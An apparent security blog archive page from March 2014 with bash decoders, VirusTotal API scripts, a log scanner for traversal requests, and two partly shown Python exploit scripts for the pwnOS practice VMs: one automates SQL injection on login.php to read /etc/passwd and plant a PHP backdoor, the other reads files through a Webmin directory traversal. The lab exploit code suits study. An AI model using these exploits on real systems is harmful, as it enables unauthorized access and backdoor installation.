Showing posts from March, 2014

Another Hex to ASCII Deobfuscator

#!/bin/bash

# Written: December 2012
# Modified: March 2014

# This program is built to decode hex to ASCII text
# The program takes what it is given at the command line and then decodes it...

testInput=$1

# echo "$testInput" -- If you echo it will read the string from the command line
# cat "$testInput" -- Takes the filename and decodes it
# Each sed call turns one literal \xNN sequence into its ASCII character.
# \x26 needs \& because a bare & in a sed replacement re-inserts the match;
# the \x27 rule is double-quoted, so its backslashes are doubled again for the shell.
# The excerpt shown here stops at \x34.
cat "$testInput" | sed 's/\\x20/ /g' | \
        sed 's/\\x21/!/g' | sed 's/\\x22/"/g' | sed 's/\\x23/#/g' | sed 's/\\x24/$/g' | \
        sed 's/\\x25/%/g' | sed 's/\\x26/\&/g' | sed "s/\\\\x27/'/g" | sed 's/\\x28/(/g' | \
        sed 's/\\x29/)/g' | sed 's/\\x2A/*/g' | sed 's/\\x2B/+/g' | sed 's/\\x2C/,/g' | \
        sed 's/\\x2D/-/g' | sed 's/\\x2E/./g' | sed 's/\\x2F/\//g' | sed 's/\\x30/0/g' | \
        sed 's/\\x31/1/g' | sed 's/\\x32/2/g' | sed 's/\\x33/3/g' | sed 's/\\x34/4/g'

pwnOS v2.0 - Python Script that utilizes SQL Injection on Login

I wrote this Python script to demonstrate SQL injection on pwnOS v2.0. When it runs, it will automate finding the username that the pwnOS database is running as, displaying the /etc/passwd file, and creating a simple-backdoor.php in the /var/www directory as sb.php.

The SQL injection occurs on the login.php page of pwnOS v2.0 at /var/www/login.php.

#!/usr/bin/python

import socket
import os, sys

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.100', 80))

# Initial HTTP Request to obtain a PHP Session
httpRequest = "GET /index.php HTTP/1.1\n"
httpRequest += "Host: test.com\n\n"

s.send(httpRequest)
data = s.recv(1024)

#Save the httpResponse to a file
f = open('temp.txt','w')
f.write(data)
f.close()

# Pull the PHPSESSID out of the file
with open("temp.txt") as file:
        for line in file:
                if 'PHPSESSID' in line:
                        sessionID = line[12:48]

s.recv(1024)

httpRequest …

pwnOS v1.0 Python Script for Reading files through Directory Traversal

I was working with pwnOS v1.0 to be able to gain root. One of the steps was to use a directory traversal flaw in miniserv to read files on the filesystem. I liked the Metasploit module, but I found that I wanted a quicker script and something I could save the output with. I then designed the following script using Python:

#!/usr/bin/python

# This script was built off of the concept of the Metasploit auxiliary plugin for
# displaying files on Webmin due to a directory traversal vulnerability. This allows
# you to put in place the file that you would like to pull and retrieve it quicker
# than if you are in Metasploit. You can also redirect the output to a file.

import socket
import os, sys
import urllib

if len(sys.argv) > 1:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect=s.connect(('192.168.11.151',10000))

        # Found that the %01 can be substituted for other characters.
        url = "/unauthenticated/" + "/..%01"*40 + sys.argv[1]

        httpRequest = "GE…
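
An added example, not part of the original post: a defender-side check for the request shape this script sends, flagging access-log lines whose path contains control characters or climbs above the web root once decoded. The log lines are constructed, and treating control characters inside a path segment as ignored by the server is an assumption drawn from the ..%01 sequence above.

```python
import re
from urllib.parse import unquote

CONTROL = re.compile(r'[\x00-\x1f\x7f]')
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_path(raw, max_rounds=3):
    """Strip the query string and percent-decode a bounded number of times."""
    path = raw.split('?', 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def findings(raw):
    """Return the reasons a request path looks like a traversal attempt."""
    path = decode_path(raw)
    reasons = []
    if CONTROL.search(path):
        reasons.append('control-char')
    # Assumption: the server ignores control characters inside a segment,
    # so "..\x01" has to be judged as "..".
    depth = 0
    for seg in CONTROL.sub('', path).replace('\\', '/').split('/'):
        if seg in ('', '.'):
            continue
        depth += -1 if seg == '..' else 1
        if depth < 0:  # climbed above the document root
            reasons.append('escapes-root')
            break
    return reasons

def scan(lines):
    """Yield (line_number, reasons) for each flagged access-log line."""
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        reasons = findings(m.group(1)) if m else []
        if reasons:
            yield n, reasons

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2014:10:00:00 +0000] "GET /unauthenticated/images/logo.gif HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Mar/2014:10:00:05 +0000] "GET /unauthenticated/' + '/..%01' * 40 + '/etc/hostname HTTP/1.0" 200 14',
    '192.0.2.10 - - [01/Mar/2014:10:00:09 +0000] "GET /docs/a/../b.html HTTP/1.1" 200 90',
]
```

Only the second sample line is flagged; the third contains a ".." segment but never leaves the root, so it is not reported.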

Decode Hex to ASCII Bash Script

# Decode common percent-encoded (%NN) characters in the file given as $1
cat "$1" | sed 's/%20/ /g' | sed 's/%22/"/g' | sed 's/%28/(/g' | sed 's/%29/)/g' | sed 's/%3E/>/g' | \
            sed 's/%3D/=/g'  | sed 's/%3B/;/g' | sed 's/%7C/|/g'  | sed 's/%2C/,/g' | \
            sed 's/%7B/{/g' | sed 's/%7D/}/g' | sed 's/%3C/</g' | sed 's/%3F/?/g' | sed 's@%2F@/@g' | \
            sed 's/%0A/\n/g' | sed "s/%27/'/g" | sed 's/%26/\&/g' | sed 's/%3A/:/g' | \
            sed 's/%5C/\\/g' | sed 's/%2B/+/g' | sed 's/%21/!/g'
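
An added example, not code from the original posts: both sed chains on this page (the \xNN one and the %NN one) map one escape per sed call, so any value without its own rule is left undecoded. This Python version generalises them into a single pass over all 256 values; leaving non-printable bytes escaped by default is an assumption about what an analyst wants, and the function names are hypothetical.

```python
import re
import sys

# One pattern for both escape styles on this page: \xNN and %NN.
ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})|%([0-9A-Fa-f]{2})')

def decode_escapes(text, keep_nonprintable=False):
    """Decode every \\xNN and %NN escape in a single left-to-right pass.

    A single pass never re-reads its own output, so %2541 becomes %41 and
    not A; a chain of substitutions can double-decode depending on order.
    """
    def replace(match):
        value = int(match.group(1) or match.group(2), 16)
        printable = 0x20 <= value <= 0x7E or value in (0x09, 0x0A)
        # Non-printable bytes stay escaped by default so a decoded sample
        # cannot write control sequences to the analyst's terminal.
        if printable or keep_nonprintable:
            return chr(value)
        return match.group(0)
    return ESCAPE.sub(replace, text)

def decode_file(path):
    """Decode a file line by line, like the scripts' cat-into-sed pipeline."""
    with open(path, encoding='utf-8', errors='replace') as handle:
        return [decode_escapes(line.rstrip('\n')) for line in handle]

if __name__ == '__main__' and len(sys.argv) > 1:
    for decoded in decode_file(sys.argv[1]):
        print(decoded)
```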

VirusTotal API Submission - Domain Report

This is helpful:

#!/usr/bin/python

import json
import urllib
import urllib2
import sys
import pprint

url = "https://www.virustotal.com/vtapi/v2/domain/report"

if (len(sys.argv) > 1):
        submitDomain = sys.argv[1]
        parameters = {"domain": submitDomain,   "apikey": "---API Key---"}
        response = urllib.urlopen('%s?%s' % (url, urllib.urlencode(parameters))).read()
        response_dict = json.loads(response)
        #print response_dict
        print json.dumps(response_dict, indent=4)
else:
        print "Usage: ./domainReport.py <domain>"

VirusTotal API Submission - Submit URL

Found this to be helpful:

#!/usr/bin/python

import json
import urllib
import urllib2
import sys

url = "https://www.virustotal.com/vtapi/v2/url/scan"

if (len(sys.argv) > 1):
        submitURL = sys.argv[1]
        parameters = {"url": submitURL, "apikey": "---API Key---"}
        data = urllib.urlencode(parameters)
        req = urllib2.Request(url,data)
        response = urllib2.urlopen(req)
        output = json.loads(response.read())
        print json.dumps(output, indent=4)
else:
        print "Usage: ./submitURL <url>"

VirusTotal API Submission - IP Address Report

Found this to be helpful in gathering reports about IP Addresses:

#!/usr/bin/python

import json
import urllib
import urllib2
import sys
import pprint

url = "https://www.virustotal.com/vtapi/v2/ip-address/report"

if (len(sys.argv) > 1):
        submitIP = sys.argv[1]
        parameters = {"ip": submitIP,   "apikey": "---API Key---"}
        response = urllib.urlopen('%s?%s' % (url, urllib.urlencode(parameters))).read()
        response_dict = json.loads(response)
        #print response_dict
        print json.dumps(response_dict, indent=4)
else:
        print "Usage: ./ipAddressReport <ip>"